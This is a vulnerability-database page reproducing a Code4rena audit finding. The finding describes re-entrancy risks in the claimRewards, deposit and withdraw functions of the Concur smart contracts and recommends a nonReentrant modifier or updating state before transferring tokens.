Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2022-02-CONCUR-FINDINGS-ISSUES-249
HistoryFeb 09, 2022 - 12:00 a.m.

Re-entrancy vulnerabilities

2022-02-0900:00:00
Code4rena
github.com
4
re-entrancy protection
function claimrewards
check-effects-interaction
usdmpegrecovery deposit
usdmpegrecovery withdraw
tokens safety
JSON

Lines of code

Vulnerability details

Impact

Function claimRewards in ConcurRewardPool should be re-entrancy protected or first nullify the reward before sending it, otherwise, if any token contains a transfer callback hook, users can claim the same rewards multiple times, by re-entering the function upon the transfer and repeating the call.

Also, consider applying re-entrancy protection to functions that do not follow the Check-Effects-Interaction pattern, even though they are interating with tokens that are supposed to be safe.
For instance, functions deposit and withdraw in USDMPegRecovery first send the tokens and only then set the state.

Recommended Mitigation Steps

Solution: either apply nonReentrant modifier or substitute these lines in opposite order:

  IERC20(_tokens[i]).safeTransfer(msg.sender, getting);
  reward[msg.sender][_tokens[i]] = 0;

The text was updated successfully, but these errors were encountered:

All reactions

JSON